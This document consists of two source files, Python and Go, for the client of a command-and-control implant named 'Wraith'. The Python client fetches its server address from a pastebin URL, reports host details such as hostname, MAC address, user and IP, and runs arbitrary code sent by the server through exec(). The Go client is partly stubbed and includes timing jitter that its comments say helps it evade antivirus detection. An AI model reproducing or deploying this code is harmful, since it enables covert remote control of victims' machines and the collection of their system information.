File: client/wraith.py
#!/usr/bin/python3

# Import libraries
from aes import AesEncryption as aes  # From the same dir as this file
import requests
import threading
import json
import random
import psutil
import sys
import socket
import time
import platform
import shutil
import getpass
import os
import subprocess
from uuid import getnode as get_mac

# Get start time of this wraith
start_time = time.time()

# START CONSTANTS

# Define some constants
# The URL where the URL of the C&C server is found. This option was added
# to allow the C&C URL to change without having to re-install all wraiths
FETCH_SERVER_LOCATION_URL = "https://pastebin.com/raw/dAUvxiQb"
# A key used to encrypt the first packet before a new key is sent over by the
# server. Not the most secure communication, I know. Any replacement welcome.
# However, wraiths can work over SSL and so can the panel so the security
# of this system is not critical
CRYPT_KEY = "G39UHG83H2F92JC9H92VJ29W9HCG9WMHG2F1ZE10SKXQCSPKNXKZNBDCOG0Y"
# The fingerprint of the server to trust. This prevents the wraith from
# accidentally connecting and sending info to the wrong server if the
# URL is wrong
TRUSTED_SERVER = "VWIVWNODCOWQPSPL"
# Port used by the wraith on localhost to check if other wraiths are currently
# running. We don't want duplicates
NON_DUPLICATE_CHECK_PORT = 47402
# Whether to log the interactions with the server to the console.
# Not recommended except for debugging
INTERACTION_LOGGING = True

# END CONSTANTS

# Now, we fork :)
"""
while True:
    # This spawns a child process. The parent will monitor the child
    # and re-start it if it exits
    pid = os.fork()
    # If this is not the child process (is parent process), start monitoring
    # child and re-start it in case of failure
    if pid != 0:
        try:
            while True: psutil.Process(pid)
        except psutil.NoSuchProcess: continue
    # If this is the child process, exit the loop and continue
    else: break
"""

# Check if any other wraiths are active. If so, die. If not, bind
# to socket to tell all other wraiths we're active.
single_instance_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try: single_instance_socket.bind(("localhost", NON_DUPLICATE_CHECK_PORT))
except: sys.exit(0)

# Init crypt
aes = aes()

# Get the address of the wraith API
connect_url = requests.get(FETCH_SERVER_LOCATION_URL).text

# Create a class for the wraith
class Wraith(object):
    # When the wraith is created
    def __init__(self, api_url, CRYPT_KEY, crypt_obj):
        self.id = None # Will be replaced with server-assigned UUID on login
        self.api_url = api_url # Create a local copy of the API url
        self.CRYPT_KEY = CRYPT_KEY # Create a local copy of the encryption key
        self.crypt = crypt_obj # Create a local copy of the encryption object
        self.command_queue = [] # Create a queue of all the commands to run

        # Start the command running thread
        self.command_thread = threading.Thread(target=self.run_commands_thread)
        self.command_thread.start()

    # Make requests to the api and return responses
    def api(self, data_dict):
        # If we are meant to log interactions, log
        if INTERACTION_LOGGING: print("\n[CLIENT]:\n"+json.dumps(data_dict)+"\n")
        # Create the encrypted data string
        data = self.crypt.encrypt(json.dumps(data_dict), self.CRYPT_KEY).decode()
        # Generate a prefix for ID and security purposes
        prefix=("".join([random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890") for i in range(5)])+"Wr7H")
        # Send the data using a HTTP POST request and get the response (only text, don't need headers)
        try: response = requests.post(connect_url, data=prefix+data).text.encode()
        # If for some reason the request failed, return False
        except: return False
        # Attempt to decrypt the response with the crypt object and key
        response_is_crypt = True
        try: response = self.crypt.decrypt(response, self.CRYPT_KEY)
        # If this fails, the message must be unencrypted. Ignore the err and try to JSON decode
        except: response_is_crypt = False
        try:
            response = json.loads(response)
            # If we are meant to log, log
            if INTERACTION_LOGGING: print("\n[SERVER]:\n"+json.dumps(response)+"\nISCRYPT: {}\n".format(response_is_crypt))
            # If all worked out well, return the response as a dict. If something failed, return False
            return response
        except: return False

    # Get own local IP
    def get_ip(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            # Doesn't need to be reachable
            s.connect(('10.255.255.255', 1))
            IP = s.getsockname()[0]
        except: IP = '127.0.0.1'
        finally: s.close()
        return IP

    # Log in with the api
    def login(self):
        # Create the data we need to send
        data = {}
        data["message_type"] = "login"
        data["data"] = {
            "osname": socket.gethostname(),
            "ostype": platform.platform(),
            "macaddr": get_mac(),
        }
        # Send the request
        response = self.api(data)
        # Check the data received back
        if isinstance(response, type({})) and response["status"] == "SUCCESS":
            # If the server did not identify itself correctly, fail
            if response["server_id"] != TRUSTED_SERVER: return False
            # Save given ID as wraith ID. We'll identify ourselves with it from now on
            self.id = response["wraith_id"]
            # If we're told to switch encryption keys, switch
            if "switch_key" in response.keys():
                self.CRYPT_KEY = response["switch_key"]
            return True
        else: return False

    # Send a heartbeat to keep login alive and fetch commands
    def heartbeat(self):
        # Create a dict for data we need to send
        data = {}
        data["message_type"] = "heartbeat"
        data["data"] = { # Add some data for the server to record
            "info": {
                "running_as_user": getpass.getuser(),
                "available_ram": psutil.virtual_memory().free,
                "used_ram": psutil.virtual_memory().used,
                "available_disk": shutil.disk_usage("/")[2],
                "used_disk": shutil.disk_usage("/")[1],
                "local_ip": self.get_ip(),
            },
            "wraith_id": self.id,
        }
        # Send the request
        response = self.api(data)
        # Check the data received back
        if type(response) == type({}) and response["status"] == "SUCCESS" and "command_queue" in response.keys():
            # If the server did not identify itself correctly, fail
            if response["server_id"] != TRUSTED_SERVER: return False
            # Append commands to queue
            for command in response["command_queue"]:
                self.command_queue.append(command)
            # If we're told to switch encryption keys, switch
            if "switch_key" in response.keys():
                self.CRYPT_KEY = response["switch_key"]
            return True
        else: return False

    def putresult(self, status="SUCCESS", result="/No Data/"):
        # Create the data we need to send
        data = {}
        data["message_type"] = "putresults"
        data["data"] = {
            "cmdstatus": status,
            "result": result,
            "wraith_id": self.id,
        }
        # Send the request
        response = self.api(data)
        # Check the data received back
        if isinstance(response, type({})) and response["status"] == "SUCCESS":
            # If the server did not identify itself correctly, fail
            if response["server_id"] != TRUSTED_SERVER: return False
            # If we're told to switch encryption keys, switch
            if "switch_key" in response.keys():
                self.CRYPT_KEY = response["switch_key"]
            return True
        else: return False

    # Run all of the commands in the command_queue
    def run_commands(self):
        for cmd in self.command_queue:
            try:
                # Remove the command from the list
                self.command_queue.remove(cmd)
                # Define a scope for the exec call so the script_main function can be used later
                exec_scope = locals()
                # Define a script_main function to prevent errors in case of incorrectly formatted modules
                exec_scope["script_main"] = lambda a, b: 0
                # This should define the script_main function
                exec(cmd[1], globals(), exec_scope)
                # Define the script_main function as a thread
                script_thread = threading.Thread(target=exec_scope["script_main"], args=(
                    self,
                    cmd[0]
                ))
                # Notify the server that we are now executing the command
                self.putresult("SUCCESS", "Executing `{}`".format(cmd[0]))
                # Execute the command
                script_thread.start()
            except Exception as e:
                # If there was an error, report it to the server
                self.putresult("ERROR - {}".format(e), "Error while executing `{}`".format(cmd[0]))

    # Indefinitely run `run_commands`
    def run_commands_thread(self):
        while True: self.run_commands()

# Create an instance of wraith
wraith = Wraith(connect_url, CRYPT_KEY, aes)

# Start sending heartbeats
# It's ok not to login beforehand as heartbeat will fail and the wraith will
# log in when it does

# TODO retry timeout and restart
# TODO robust server error handling

while True:
    # If the heartbeat fails for some reason (implicitly execute heartbeat)
    if not wraith.heartbeat():
        # Switch to default key in case switch_key was applied
        wraith.CRYPT_KEY = CRYPT_KEY
        # Try login every 10 seconds until it works
        while not wraith.login(): time.sleep(10)
        # Continue to the next loop (re-send heartbeat)
        continue

    # Delay sending hearbeats to prevent DDoSing our own server
    time.sleep(3.2)

File: CLIENT/wraith.go
// Package Name - main produces an executable
package main

// Dependencies
import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	crand "crypto/rand"
	"crypto/tls"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"io/ioutil"
	mrand "math/rand"
	"net/http"
	"os"
	"strings"
	"sync"
	"time"

	yaegi "github.com/containous/yaegi/interp"
	yaegi_stdlib "github.com/containous/yaegi/stdlib"
)

var wraithVersion = "4.0.0"
var protocolVersion = "0"

// Define a global request counter which will make
// it easier to identify individual requests when
// debugging. It will not be used if not debugging
var globalRequestCounter uint64 = 0

// Log message (string) if in debug mode
func dlog(Type int, Message interface{}) {
	if setDEBUG {
		// Get the message type
		var MessageType string
		switch Type {
		case 0:
			MessageType = "INFO"
		case 1:
			MessageType = "WARN"
		case 2:
			MessageType = "ERRO"
		default:
			MessageType = "INFO"
		}
		// Print the message with the current timestamp
		fmt.Printf("<%s> | %s: %v\n", time.Now().Format("15:04:05 02-01-2006"), MessageType, Message)
	}
}

func req(ReqType string, URL string, VerifySSL bool, DataType string, Data string) (string, error) {

	// Define Transport and Client for HTTP communication
	transport := &http.Transport{
		MaxIdleConns:       10,
		IdleConnTimeout:    15 * time.Second,
		DisableCompression: false,
		TLSClientConfig:    &tls.Config{InsecureSkipVerify: VerifySSL},
	}
	client := &http.Client{Transport: transport}

	var (
		resp *http.Response
		err  error
	)

	if ReqType == "GET" {

		// Make GET request
		resp, err = client.Get(URL)

	} else if ReqType == "POST" {

		// Make POST request
		resp, err = client.Post(URL, DataType, strings.NewReader(Data))

	} else {
		return "", errors.New("invalid request method specified")
	}

	if setDEBUG {
		// If debugging, increment the global request counter to keep track
		// of requests.
		globalRequestCounter++
	}

	// Log the request
	dlog(0, "`"+ReqType+"` request (ID `"+fmt.Sprint(globalRequestCounter)+"`) to `"+URL+"`")

	// Handle any errors
	if err != nil {
		return "", errors.New("http request failed with error \"" + err.Error() + "\"")
	} else if resp.StatusCode != 200 {
		// Close the response body when the function returns
		defer resp.Body.Close()
		return "", errors.New("non-200 http response code (" + fmt.Sprint(resp.StatusCode) + ")")
	} else {
		// Close the response body when the function returns
		defer resp.Body.Close()
		// Read the body of the response
		RawBody, err := ioutil.ReadAll(resp.Body)
		// Handle errors in reading the body
		if err != nil {
			return "", errors.New("error while reading the response body")
		}
		// Trim the response body to prevent errors
		body := strings.Trim(string(RawBody), " \n\v\t")
		// Return the response body and no errors
		return body, nil
	}

}

type wraithStruct struct {
	WraithID                 string     // ID of the Wraith assigned by the server
	WraithStartTime          time.Time  // A copy of the Wraith start time
	RunWraith                bool       // A flag controlling whether the Wraith should run
	ControlAPIURL            string     // URL of the C&C server's API page
	APIRequestPrefix         string     // The prefix to add to each API request
	TrustedAPIFingerprint    string     // The fingerprint that must be supplied by API responses for them to be trusted
	CryptKey                 string     // The encryption key to use to communicate with the API
	HeartbeatDelay           uint64     // The delay between each successful heartbeat
	HandshakeReattemptDelay  uint64     // The delay between handshake reattempts if the failed heartbeat tolerance is exceeded
	FailedHeartbeatTolerance uint64     // How many failed handshakes in a row until the connection is reset
	Plugins                  []string   // List of all plugins included with this Wraith
	CommandQueue             []string   // A slice of the commands to be executed
	CommandQueueMutex        sync.Mutex // A mutex preventing CommandQueue from being modified by multiple goroutines at the same time
}

func (wraith *wraithStruct) RefreshAPIURL() error {
	// Send a GET request to setCCSERVERGETURL (we do not verify the SSL
	// certificate as no sensitive information is being transferred and SSL errors
	// could prevent connections to C&C. All other HTTPS connections are verified
	// however)
	response, err := req("GET", setCCSERVERGETURL, false, "", "")

	if err != nil {
		return err
	}

	// Set the API URL to the received string
	wraith.ControlAPIURL = response

	return nil

}

func (wraith *wraithStruct) Encrypt(plaintext string) (string, error) {
	// Adapted from https://github.com/mervick/aes-everywhere/

	// Helper functions
	DeriveKeyAndIv := func(passphrase string, salt string) (string, string) {
		salted := ""
		dI := ""

		for len(salted) < 48 {
			md := md5.New()
			md.Write([]byte(dI + passphrase + salt))
			dM := md.Sum(nil)
			dI = string(dM[:16])
			salted = salted + dI
		}

		key := salted[0:32]
		iv := salted[32:48]

		return key, iv
	}

	PKCS7Padding := func(ciphertext []byte, blockSize int) []byte {
		padding := blockSize - len(ciphertext)%blockSize
		padtext := bytes.Repeat([]byte{byte(padding)}, padding)
		return append(ciphertext, padtext...)
	}

	// Create a salt
	salt := make([]byte, 8)
	if _, err := io.ReadFull(crand.Reader, salt); err != nil {
		return "", err
	}

	// Derive key and initialisation vector
	key, iv := DeriveKeyAndIv(wraith.CryptKey, string(salt))

	// Create a cipher block based on a bytearray of the key
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}

	// Encrypt the plaintext
	pad := PKCS7Padding([]byte(plaintext), block.BlockSize())
	ecb := cipher.NewCBCEncrypter(block, []byte(iv))
	encrypted := make([]byte, len(pad))
	ecb.CryptBlocks(encrypted, pad)

	return base64.StdEncoding.EncodeToString([]byte("Salted__" + string(salt) + string(encrypted))), nil
}

func (wraith *wraithStruct) Decrypt(ciphertext string) (string, error) {
	// Adapted from https://github.com/mervick/aes-everywhere/

	// Helper functions
	DeriveKeyAndIv := func(passphrase string, salt string) (string, string) {
		salted := ""
		dI := ""

		for len(salted) < 48 {
			md := md5.New()
			md.Write([]byte(dI + passphrase + salt))
			dM := md.Sum(nil)
			dI = string(dM[:16])
			salted = salted + dI
		}

		key := salted[0:32]
		iv := salted[32:48]

		return key, iv
	}

	PKCS7Trimming := func(encrypt []byte) []byte {
		padding := encrypt[len(encrypt)-1]
		return encrypt[:len(encrypt)-int(padding)]
	}

	// Base64 decode the ciphertext
	ct, _ := base64.StdEncoding.DecodeString(ciphertext)
	// Check if it is valid ciphertext
	if len(ct) < 16 || string(ct[:8]) != "Salted__" {
		return "", errors.New("not valid ciphertext")
	}

	// Get the salt, ciphertext, key and initialisation vector
	salt := ct[8:16]
	ct = ct[16:]
	key, iv := DeriveKeyAndIv(wraith.CryptKey, string(salt))

	// Create a cipher block based on a bytearray of the key
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}

	// Decrypt the ciphertext
	cbc := cipher.NewCBCDecrypter(block, []byte(iv))
	dst := make([]byte, len(ct))
	cbc.CryptBlocks(dst, ct)

	return string(PKCS7Trimming(dst)), nil
}

func (wraith *wraithStruct) API(requestData interface{}) (APIResponse map[string]interface{}, APIErr error) {

	// Log the API request
	dlog(0, "request to API with contents `"+fmt.Sprint(requestData)+"`")

	// As JSON decode can cause a panic (if the read data does not match the
	// data type map[string]string but is valid JSON) and en/decrypt probably
	// can too, defer a function to handle the panic
	defer func() {
		// Catch any panics
		if panic := recover(); panic != nil {
			APIResponse = nil
			APIErr = errors.New("api function panicked with error `" + fmt.Sprint(panic) + "`")
		}

		errorToLog := "none"
		if APIErr != nil {
			errorToLog = APIErr.Error()
		}

		// Log the response from the API
		dlog(0, "response from API with contents `"+fmt.Sprint(APIResponse)+"` (error `"+errorToLog+"`)")
	}()

	// Create the prefix
	requestPrefix := wraith.APIRequestPrefix
	// The char after the prefix indicates whether the request is from
	// a Wraith or panel. A non-zero odd number indicates a Wraith while
	// a non-zero even number indicates a panel.
	requestIDCharOptions := []string{"1", "3", "5", "7", "9"}
	requestPrefix += requestIDCharOptions[mrand.Intn(len(requestIDCharOptions))]

	// Convert the message to JSON (results in a bytearray)
	requestDataEncoded, errEncode := json.Marshal(requestData)

	// Check for errors and return them if any
	if errEncode != nil {
		return nil, errEncode
	}

	// Encrypt the JSON data
	requestDataEncrypted, errCrypt := wraith.Encrypt(string(requestDataEncoded))

	// Check for errors and return if any
	if errCrypt != nil {
		return nil, errEncode
	}

	// Add the prefix and protocol version to the base64-encoded, encrypted data
	requestDataFinal := requestPrefix + protocolVersion + requestDataEncrypted

	// Send the final data to the API
	response, errReq := req("POST", wraith.ControlAPIURL, true, "application/octet-stream", requestDataFinal)

	// Check for request errors and return if any
	if errReq != nil {
		return nil, errReq
	}

	// Verify that the response is indeed a valid API response (prefix)
	if !(strings.HasPrefix(response, setAPIREQPREFIX)) {
		return nil, errors.New("not valid API response - no prefix")
	}

	// Remove the prefix from the response (the API does not send an ID char so no need to remove that)
	response = strings.TrimPrefix(response, setAPIREQPREFIX)

	// Try decrypting the API response. If this fails, assume the response is plaintext
	responseDecrypted, errDcrypt := wraith.Decrypt(response)

	// Define variable to hold the processed response
	var finalResponse map[string]interface{}
	// Check for decryption failure
	switch errDcrypt {
	case nil:
		// If there was no decryption error, try to JSON decode the decrypted response
		errDecode := json.Unmarshal([]byte(responseDecrypted), &finalResponse)
		// Sometimes, decryption may work but the result may still not be what
		// we want so fallback to decoding the raw response
		if errDecode != nil {
			goto noDecryptDecode
		}
		break
	noDecryptDecode:
		fallthrough
	default:
		// If there was a decryption error, try to JSON decode the plain response
		errDecode := json.Unmarshal([]byte(response), &finalResponse)
		// If this produces an error, the response was not valid so return an error
		if errDecode != nil {
			return nil, errors.New("not valid API response - incorrectly encrypted/encoded")
		}
	}

	// Verify that the API fingerprint is present and trusted
	if APIFingerprint, ok := finalResponse["api_fingerprint"]; ok {
		if APIFingerprint != wraith.TrustedAPIFingerprint {
			return nil, errors.New("api provided untrusted fingerprint")
		}
	} else {
		return nil, errors.New("api did not identify itself")
	}

	// If an API response contains the `switch_key`, set the encryption key to it
	if switchKey, ok := finalResponse["switch_key"]; ok {
		wraith.CryptKey = fmt.Sprint(switchKey)
	}

	// Finally, check if the API replied with a success code or if it reports an error
	// or nothing
	if statusCode, ok := finalResponse["status"]; ok {
		if statusCode == "SUCCESS" {
			// If the API reply indicates success

			// Nothing
		} else if statusCode == "ERROR" {
			// If the API reply indicates error

			// Return the response dict along with an error

			// Check if the server has provided an error message
			if errMsg, ok := finalResponse["message"]; ok {
				// If it has, include it in the error
				return finalResponse, errors.New("api returned an error code with message `" + fmt.Sprint(errMsg) + "`")
			}
			// If it has not, return a less informative error message
			return finalResponse, errors.New("api returned an error code without any message")
		} else {
			// No other reply is valid in this protocol so error
			return finalResponse, errors.New("api returned invalid status code")
		}
	} else {
		// If no status code was supplied, assume success
		finalResponse["status"] = "SUCCESS"
	}

	return finalResponse, nil

}

func (wraith *wraithStruct) Handshake() error {

	// Get required data
	hostname, hostnameGetErr := os.Hostname()
	if hostnameGetErr != nil {
		hostname = "null"
	}

	// Create data required by the panel for logging in
	data := map[string]interface{}{
		"req_type": "handshake",
		"host_info": map[string]interface{}{
			"arch":        "",
			"hostname":    hostname,
			"os_type":     "",
			"os_version":  "",
			"reported_ip": "",
		},
		"wraith_info": map[string]interface{}{
			"version":      "",
			"start_time":   "",
			"plugins":      "",
			"env":          "",
			"pid":          "",
			"ppid":         "",
			"running_user": "",
		},
	}

	// Send the data
	wraith.API(data)

	return nil

}

func (wraith *wraithStruct) Heartbeat() error {
	return errors.New("")
}

func (wraith *wraithStruct) Exec(command string) {

	// Create an interpreter instance to run golang scripts (commands)
	i := yaegi.New(yaegi.Options{})

	// TODO
	i.Use(yaegi_stdlib.Symbols)

	_, err := i.Eval(`import "fmt"`)
	if err != nil {
		panic(err)
	}

}

// Main function to run on Wraith start
func main() {

	// Get the start time of the Wraith
	WraithStartTime := time.Now()

	// Print some debugging information if debug mode is enabled
	dlog(0, "RUNNING IN DEBUG MODE!")
	dlog(0, "Wraith version `v"+wraithVersion+"`")
	dlog(0, "Wraith started at `"+WraithStartTime.Format("15:04:05 02-01-2006")+"`")

	// Seed the random number generator with the current time plus the start time
	mrand.Seed(time.Now().UTC().UnixNano() + WraithStartTime.UTC().UnixNano())

	// Log imported plugins
	dlog(0, "using plugins `"+fmt.Sprint(setPLUGINS)+"`")

	// Create an instace of Wraith
	wraith := wraithStruct{}
	// Set the Wraith properties to their defaults
	wraith.WraithID = ""
	wraith.WraithStartTime = WraithStartTime
	wraith.RunWraith = true
	wraith.ControlAPIURL = ""
	wraith.APIRequestPrefix = setAPIREQPREFIX
	wraith.TrustedAPIFingerprint = setTRUSTEDSERVERFINGERPRINT
	wraith.CryptKey = setSECONDLAYERENCRYPTIONKEY
	wraith.HeartbeatDelay = setDEFAULTHEARTBEATDELAYBASE
	wraith.HandshakeReattemptDelay = setDEFAULTHANDSHAKEREATTEMPTDELAY
	wraith.FailedHeartbeatTolerance = setFAILEDHEARTBEATTOLERANCE
	wraith.Plugins = setPLUGINS
	wraith.CommandQueue = []string{}
	wraith.CommandQueueMutex = sync.Mutex{}

	// Get the URL of the API we connect to. Repeat until success
	for {
		dlog(0, "refreshing API URL")
		// Refresh the API URL
		err := wraith.RefreshAPIURL()

		if err != nil {
			// Display the error
			dlog(3, "error while refreshing API URL `"+err.Error()+"`")
			dlog(0, "eetrying API URL refresh in `"+fmt.Sprint(setDEFAULTHANDSHAKEREATTEMPTDELAY)+"` seconds")
			// Wait for the handshake reattempt delay since it is similar to this event
			time.Sleep(time.Duration(setDEFAULTHANDSHAKEREATTEMPTDELAY) * time.Second)
		} else {
			// Log that the API URL was successfuly refreshed
			dlog(3, "API URL refreshed to `"+wraith.ControlAPIURL+"`")
			break
		}
	}

	// Counter for the number of failed heartbeats in a row. Initially set this
	// to the maximum tolerated amount as the first handshake will always fail
	// anyway due to the Wraith not being logged in
	FailedHeartbeatCounter := wraith.FailedHeartbeatTolerance
	// Main Wraith loop - run until exit flag on Wraith is set
	for wraith.RunWraith {

		// If the heartbeat failed for whatever reason
		if heartbeatErr := wraith.Heartbeat(); heartbeatErr != nil {
			// Increment the counter
			FailedHeartbeatCounter++

			dlog(3, "sending heartbeat to api at `"+wraith.ControlAPIURL+"` failed and the failed heartbeat tolerance was exceeded so retrying handshake")

			// If the counter exceeds the failed heartbeat tolerance
			if FailedHeartbeatCounter > wraith.FailedHeartbeatTolerance {

				// Reset the encryption key so we can communicate with the server
				wraith.CryptKey = setSECONDLAYERENCRYPTIONKEY

				// Try to perform a handshake again to re-set the connection
				for handshakeErr := wraith.Handshake(); handshakeErr != nil; {

					dlog(3, "handshake with server at `"+wraith.ControlAPIURL+"` failed")

					// Add between 0 and 3 seconds to the delay randomly
					// This should prevent the requests from appearing to be automated
					// and make the Wraith less detectable to antivirus software
					nextHandshakeDelay := wraith.HandshakeReattemptDelay + uint64(mrand.Intn(3))

					dlog(0, "retrying handshake in `"+fmt.Sprint(nextHandshakeDelay)+"` seconds")

					time.Sleep(time.Duration(nextHandshakeDelay) * time.Second)

					// Refresh the C&C API URL. We may have disconnected due to an address change.
					// This does not need error checking as we will loop back to it anyway unless
					// we handshake successfully in which case it's not needed.
					wraith.RefreshAPIURL()

				}

				// The handshake succeeded so log it and wait for heartbeat
				nextHandshakeDelay := wraith.HeartbeatDelay + uint64(mrand.Intn(3))
				dlog(0, "handshake succeeded so sending heartbeat in `"+fmt.Sprint(nextHandshakeDelay)+"` seconds")
				time.Sleep(time.Duration(nextHandshakeDelay) * time.Second)

			} else {
				// If the heartbeat failed but the failed heartbeat tolerance was
				// not exceeded, wait then retry
				dlog(3, "heartbeat with api at `"+wraith.ControlAPIURL+"` failed but the failed heartbeat tolerance was not exceeded")

				nextHeartbeatDelay := wraith.HeartbeatDelay + uint64(mrand.Intn(3))
				dlog(0, "resending heartbeat in `"+fmt.Sprint(nextHeartbeatDelay)+"` seconds")
				time.Sleep(time.Duration(nextHeartbeatDelay) * time.Second)
			}

		} else {
			// If the heartbeat succeeded, reset the fail counter
			FailedHeartbeatCounter = 0

			// And log the successful heartbeat
			dlog(0, "successful heartbeat with api at `"+wraith.ControlAPIURL+"`")

			// Then execute any new commands
			for _, command := range wraith.CommandQueue {
				wraith.Exec(command)
			}

			// Then wait for next heartbeat
			nextHeartbeatDelay := wraith.HeartbeatDelay + uint64(mrand.Intn(3))
			time.Sleep(time.Duration(nextHeartbeatDelay) * time.Second)
		}

	}
}
